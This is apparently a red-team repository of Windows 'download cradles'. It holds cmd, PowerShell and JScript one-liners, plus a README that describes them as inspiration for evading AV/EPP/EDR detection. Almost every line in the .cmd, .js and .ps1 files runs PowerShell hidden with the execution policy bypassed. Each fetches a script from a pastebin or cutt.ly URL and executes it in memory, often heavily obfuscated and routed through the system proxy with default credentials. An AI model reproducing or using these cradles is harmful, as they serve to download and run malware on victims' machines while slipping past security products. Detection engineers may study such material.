├── Download-Cradles.cmd
├── Download:Cradle.js
├── Download_Cradles.hta
├── Download_Cradles.ps1
└── README.md
/Download-Cradles.cmd:
--------------------------------------------------------------------------------
1 | # Not proxy aware download cradles, which can be executed in a Windows Command Shell (cmd.exe)
2 | # Windows Command Shell download cradles, not proxy aware ligthly obfuscated
3 | cmd> c:\WInDowS\sySTEM32\cmD.eXE /c PoWErSheLl -nopROfi -EXe byPAsS -wiNDOwsTy HIDdEN -cOMMA "IEX (New-Object Net.Webclient).downloadstring(\"https://pastebin.com/raw/88SGrHVh\")"
4 | cmd> PoWErSheLl -nopROfi -EXe byPAsS -wiNdOwsTy HIDdEN -cOMMA "IEX (New-Object Net.Webclient).downloadstring(\"https://pastebin.com/raw/88SGrHVh\")"
5 | cmd> POWErshelL -NoPRofi -WiNdoWSTYL hidd -EXecUTiOnPO BYpASS -cO "i`EX ( neW-o`BJE`cT N`ET.`weBcl`IeNT ).\"do`wnLO`ADS`TRinG\"( \"https://pastebin.com/raw/88SGrHVh\" )"
6 |
7 | # Windows Command Shell download cradles, not proxy aware obfuscated
8 | cmd> c:\wiNdoWs\sysTEM32\CmD /c pOWeRsheLl -WiNDOW HIddEN -eXECUTI BYpaSS -nop -CoMmanD "(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/88SGrHVh')|.( ([String]''.Chars)[15,18,19]-Join'')"
9 | cmd> pOWeRshell -WiNDOW HIddEN -eXECUTI BYpaSS -nop -CoMmanD "(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/88SGrHVh')|.( ([String]''.Chars)[15,18,19]-Join'')"
10 | cmd> pOWERShELl -NopROFi -wIN hidd -EXEcutiOnPoLiC BYpAsS -COm "$url='https://pastebin.com/raw/88SGrHVh';$wc2='Net.WebClient';$wc=(New-Object $wc2);$ds='DownloadString';$wc.$ds.Invoke($url)|Invoke-Expression"
11 | cmd> POWERShelL -W hId -eXECuTionpoLIC BYPaSS -NOprOfiLe -cOmMA "$url='https://pastebin.com/raw/88SGrHVh';$wc2='Net.WebClient';$wc=(New-Object $wc2);$ds='DownloadString';IEX($wc.$ds.Invoke($url))"
12 | cmd> POWeRsHeLl -cO "&( ([String]''.Normalize)[23,15,46]-Join'')(([Char[]](New-Object Net.WebClient).DownloadData('https://pastebin.com/raw/88SGrHVh'))-Join'')"
13 | cmd> POWerSHElL -CommA "i`Ex ( nE`w-`ObJect Ne`T.WEBCl`Ient ).\"DowNlo`Ads`TRI`NG\"( \"ht\"+\"tps://pastebin.com/raw/88SGrHVh\" )"
14 |
15 |
16 | # Proxy aware download cradles, which can be executed in a Windows Command Shell (cmd.exe)
17 | # Info: I use a shortcut link to the raw link from your hosted payload on Github
18 | # For example, https://cutt.ly/syFzILH directs to the raw link of hosted payload on github
19 |
20 | # Windows Command Shell download cradles, proxy aware ligthly obfuscated
21 | cmd> c:\wInDOwS\sysTem32\CmD /cPowErShell -wINdowstYL Hi -nop -eXecU ByPAss -COm "$c=new-object net.webclient;$c.proxy=[Net.WebRequest]::GetSystemWebProxy();$c.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;iex $c.downloadstring(\"https://pastebin.com/raw/88SGrHVh\")"
22 | cmd> PowErShell -wINdOwstYL Hi -nop -eXecU BYpAss -COm "$c=new-object net.webclient;$c.proxy=[Net.WebRequest]::GetSystemWebProxy();$c.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;iex $c.downloadstring(\"https://pastebin.com/raw/88SGrHVh\")"
23 |
24 | # Windows Command Shell download cradles, proxy aware heavy obfuscated
25 | cmd> C:\WINdOWS\SySteM32\CmD.EXe /cpOWershEll -eXecut byPaSS -Noprof -w H -Co "$c=new-object net.webclient;$c.proxy=[Net.WebRequest]::GetSystemWebProxy();$c.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;`i`e`x $c.downloadstring(\"ht\"+\"tps://pastebin.com/raw/88SGrHVh\")"
26 | cmd> poWershELl -eXecUT byPAss -WINDo 1 -nOpR -coMm "& ((vARiaBlE '*mdr*').Name[3,11,2]-JoiN'') ((('{2}c=new-obj'+'ect ne'+'t.'+'webclient;{2'+'}'+'c.p'+'roxy='+'[Net'+'.'+'WebR'+'equest]::'+'GetS'+'yst'+'emWebP'+'ro'+'x'+'y();{'+'2}c'+'.Pr'+'oxy.Cre'+'dentials=[Net'+'.Cr'+'edentialC'+'ache]::D'+'e'+'fau'+'l'+'tCredenti'+'als'+';{0}i{0}e'+'{0}x {'+'2}c.downl'+'oa'+'ds'+'t'+'ring({1}ht{1}+{1'+'}t'+'ps'+':'+'/'+'/'+'cutt.ly/syFzIL'+'H{1})') -F [cHAR]96,[cHAR]34,[cHAR]36))"
27 |
--------------------------------------------------------------------------------
/Download:Cradle.js:
--------------------------------------------------------------------------------
1 | #Info: Proxy Aware Download Cradle
2 | a=new ActiveXObject("wsCripT.sHell");
3 | a.run('PoWeRsHelL.eXe -NoP -w HidDen -c $a=neW-ObJeCt nET.wEbClieNt;$a.pROxy=[NeT.WeBreQueSt]::geTsyStEmweBprOxy();$a.prOxY.crEdEnTials=[NEt.crEdEnTiaLcaChe]::deFaUltcrEdeNtials;IeX $a.DOwNLOadstRiNg(\'https://pastebin.com/raw/88SGrHVh\')', 0);
4 |
5 | #Info: Proxy Aware Download Cradle
6 | c=new ActiveXObject("W"+"S"+"cr"+"ip"+"t."+"S"+"h"+"e"+"l"+"l");
7 | c.run('PoWeRsHelL.eXe -NoP -w HidDen -c $a=neW-ObJeCt nET.wEbClieNt;$a.pROxy=[NeT.WeBreQueSt]::geTsyStEmweBprOxy();$a.prOxY.crEdEnTials=[NEt.crEdEnTiaLcaChe]::deFaUltcrEdeNtials;IeX $a.DOwNLOadstRiNg(\'ht\'+\'tps://pastebin.com/raw/88SGrHVh\')', 0);
8 |
--------------------------------------------------------------------------------
/Download_Cradles.hta:
--------------------------------------------------------------------------------
1 |
2 |
3 |
8 |
10 |
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/Download_Cradles.ps1:
--------------------------------------------------------------------------------
1 | # Not proxy aware download cradles, which can be executed in a Windows PowerShell (powershell.exe)
2 | # Windows PowerShell default download cradle not proxy aware
3 | ps> IEX (New-Object Net.Webclient).downloadstring("https://pastebin.com/raw/88SGrHVh")
4 | ps> Invoke-Expression((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/88SGrHVh'))
5 |
6 |
7 | # Windows PowerShell lightly obfuscated Cradle not proxy aware
8 | ps> (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/88SGrHVh')|.( ([String]''.Chars)[15,18,19]-Join'')
9 | ps> i`EX ( neW-o`BJE`cT N`ET.`weBcl`IeNT )."do`wnLO`ADS`TRinG"( "https://pastebin.com/raw/88SGrHVh" )
10 | ps> Invoke-Expression((.(Get-Command N*-O*)Net.WebClient).DownloadString('https://pastebin.com/raw/88SGrHVh'))
11 | ps> i`Ex ( nE`w-`ObJect Ne`T.WEBCl`Ient )."DowNlo`Ads`TRI`NG"( "ht"+"tps://pastebin.com/raw/88SGrHVh" )
12 |
13 |
14 | # Windows PowerShell heavily obfuscated Cradle not proxy aware
15 | ps> Invoke-Expression((.(Get-Command N*-O*)Net.WebClient).(((((.(Get-Command N*-O*)Net.WebClient)).PsObject.Methods)|Where-Object{(Get-Variable _ -Value).Name-clike'*wn*d*g'}).Name).Invoke('https://pastebin.com/raw/88SGrHVh'))
16 | ps> $ExecutionContext|ForEach{(GV _).Value.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where-Object{(GV _).Value.Name-ilike'*v*ip*'}).Name)((([Char[]][System.Net.WebClient]::New().DownloadData('https://pastebin.com/raw/88SGrHVh'))-Join''))}
17 | ps> &( ([String]''.Normalize)[3,45,46]-Join'')(([Char[]](New-Object Net.WebClient).DownloadData('https://pastebin.com/raw/88SGrHVh'))-Join'')
18 | ps> $url='http://server/payload.ps1';$wc2='Net.WebClient';$wc=(New-Object $wc2);$ds='DownloadString';$wc.$ds.Invoke($url)|Invoke-Expression
19 | ps> $url='https://pastebin.com/raw/88SGrHVh';$wc2='Net.WebClient';$wc=(New-Object $wc2);$ds='DownloadString';IEX($wc.$ds.Invoke($url))
20 | ps> &( ([String]''.Normalize)[23,15,46]-Join'')(([Char[]](New-Object Net.WebClient).DownloadData('https://pastebin.com/raw/88SGrHVh'))-Join'')
21 | ps> $ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|?{$_.Name-clike'*S*i*t'}).Name).Invoke((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/88SGrHVh'))
22 | ps> &( (Get-ChildItem Variable:P*ho*).Value[4]+$PsHome[30]+'x')(.(Get-Command N*-O*)Net.WebClient).(((((.(Get-Command N*-O*)Net.WebClient)).PsObject.Methods)|Where-Object{(Get-Variable _ -Value).Name-clike'*wn*d*g'}).Name).Invoke('https://pastebin.com/raw/88SGrHVh')
23 |
24 | #Info: &(GAL IE*) = Alias IEX; .(Get-Command N*ct) = New-Object
25 | #Info: .(((((.(Get-Command N*ct)Net.WebClient)).PsObject.Methods)|Where{(Variable _ -ValueOn).Name-like'*nl*g'}).Name).Invoke = Downloadstring
26 | ps> &(GAL IE*)((.(Get-Command N*ct)Net.WebClient).(((((.(Get-Command N*ct)Net.WebClient)).PsObject.Methods)|Where{(Variable _ -ValueOn).Name-like'*nl*g'}).Name).Invoke("ht"+"tps://pastebin.com/raw/88SGrHVh"))
27 |
28 |
29 |
30 | # Proxy aware download cradles
31 | # Info: I use a shortcut link to the raw link from your hosted payload on Github
32 | # For example, https://cutt.ly/syFzILH directs to the raw link of hosted payload on github
33 |
34 | # Windows PowerShell default download cradle proxy aware
35 | ps> $c=new-object net.webclient;$c.proxy=[Net.WebRequest]::GetSystemWebProxy();$c.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;iEx $c.downloadstring("https://pastebin.com/raw/88SGrHVh")
36 |
37 | # Windows PowerShell obfuscated cradle proxy aware
38 | ps> (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/88SGrHVh')|.$ExecutionContext.(($ExecutionContext|Member)[6].Name).GetCmdlet($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|?{$_.Name-like'*man*Name'}).Name).Invoke('*ke-*pr*',1,$TRUE))
39 |
40 | # Windows PowerShell obfuscated cradle proxy aware
41 | ps> $c=new-object net.webclient;$c.proxy=[Net.WebRequest]::GetSystemWebProxy();$c.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;`i`E`x $c.downloadstring("ht"+"tps://pastebin.com/raw/88SGrHVh")
42 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Payload Download Cradles
2 | This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass
3 | AV/EPP/EDR in context of download cradle detections. Notice, removing or obfuscating signatures from your download cradle is
4 | only one piece of the puzzle to bypass an AV/EPP/EDR. Depending on the respective product you have to modify your payload which
5 | should be downloaded by the cradle to bypass API-Hooking, Callbacks, AMSI etc.
6 |
7 | Creds to Daniel Bohannon for his amazing obfuscation tools, many thanks to Daniel.
8 |
9 | https://github.com/danielbohannon/Invoke-Obfuscation
10 |
11 | https://github.com/danielbohannon/Invoke-CradleCrafter
12 |
13 | https://github.com/danielbohannon/Invoke-DOSfuscation
14 |
--------------------------------------------------------------------------------